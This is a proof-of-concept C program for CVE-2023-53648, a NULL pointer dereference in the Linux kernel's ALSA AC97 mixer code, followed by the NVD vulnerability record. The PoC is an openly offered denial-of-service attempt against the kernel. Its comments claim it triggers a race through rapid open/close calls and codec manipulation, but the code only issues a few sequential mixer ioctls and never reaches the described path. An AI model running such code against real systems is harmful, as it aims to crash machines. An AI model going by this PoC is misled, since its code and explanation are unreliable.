CVE-2023-53648

/* * CVE-2023-53648 PoC - Linux Kernel ALSA AC97 NULL Pointer Dereference * * This PoC demonstrates how to trigger the NULL pointer dereference * in snd_ac97_mixer() by manipulating AC97 codec initialization. * * Note: This requires local access and appropriate privileges to load * AC97 audio driver modules. */ #include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> #include <sys/ioctl.h> #include <linux/soundcard.h> int main(int argc, char *argv[]) { int fd; int ret; /* Open the AC97 mixer device */ fd = open("/dev/mixer", O_RDWR); if (fd < 0) { perror("Failed to open /dev/mixer"); /* Try alternative mixer device paths */ fd = open("/dev/sound/mixer", O_RDWR); if (fd < 0) { perror("Failed to open mixer device"); return 1; } } /* Trigger snd_ac97_mixer() with conditions that lead to NULL rac97 */ /* Perform mixer operations that invoke the vulnerable code path */ ret = ioctl(fd, SOUND_MIXER_READ_VOLUME, 0); if (ret < 0) { perror("ioctl failed"); } /* Attempt to trigger the NULL dereference path */ /* By performing rapid open/close operations on the mixer device, * we can trigger race conditions where rac97 becomes NULL */ close(fd); /* Re-open and perform operations to trigger vulnerability */ fd = open("/dev/mixer", O_RDWR); if (fd >= 0) { /* Rapid sequence of mixer ioctl calls to trigger the bug */ ioctl(fd, SOUND_MIXER_READ_DEVMASK, 0); ioctl(fd, SOUND_MIXER_READ_RECMASK, 0); ioctl(fd, SOUND_MIXER_READ_STEREODEVS, 0); ioctl(fd, SOUND_MIXER_READ_CAPS, 0); close(fd); } printf("PoC execution completed. Check kernel logs for oops/panic.\n"); return 0; }

{"cve": {"id": "CVE-2023-53648", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:48.257", "lastModified": "2026-02-03T22:29:08.257", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nALSA: ac97: Fix possible NULL dereference in snd_ac97_mixer\n\nsmatch error:\nsound/pci/ac97/ac97_codec.c:2354 snd_ac97_mixer() error:\nwe previously assumed 'rac97' could be null (see line 2072)\n\nremove redundant assignment, return error if rac97 is NULL."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.6.28", "versionEndExcluding": "4.14.322", "matchCriteriaId": "E014849F-B835-4A5D-A9D4-60A961FC53F9"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.15", "versionEndExcluding": "4.19.291", "matchCriteriaId": "D2D2CA9F-4CC4-4AF5-8C6D-E58415AB782E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.20", "versionEndExcluding": "5.4.251", "matchCriteriaId": "7FA663C4-CA72-4B5A-8592-7354D978F58E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.188", "matchCriteriaId": "43CAE50A-4A6C-488E-813C-F8DB77C13C8B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.121", "matchCriteriaId": "EC77775B-EC31-4966-966C-1286C02B2A85"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.1.39", "matchCriteriaId": "9BD1D4A1-304D-4187-8178-6D7C0050B1AF"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.13", "matchCriteriaId": "95CB4836-7F5D-4C20-B025-8E046EC87B78"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.4", "versionEndExcluding": "6.4.4", "matchCriteriaId": "6AB81046-CB69-4115-924C-963B37C41385"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/09baf460dfba79ee6a0c72e68ccdbbba84d894df", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/228da1fa124470606ac19783e551f9d51a1e01b0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/300e26e3e64880de5013eac8831cf44387ef752c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/5f13d67027fa782096e6aee0db5dce61c4aeb613", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/79597c8bf64ca99eab385115743131d260339da5", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/809af7bb4219bdeef0dbb8b2ed700d6516d13fe9", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/d28b83252e150155b8b8c65b612c555e93c8b45f", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e4cccff1e7ab6ea30995b6fbbb007d02647e025c", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f923a582217b198b557756809ffe42ac0fad6adb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}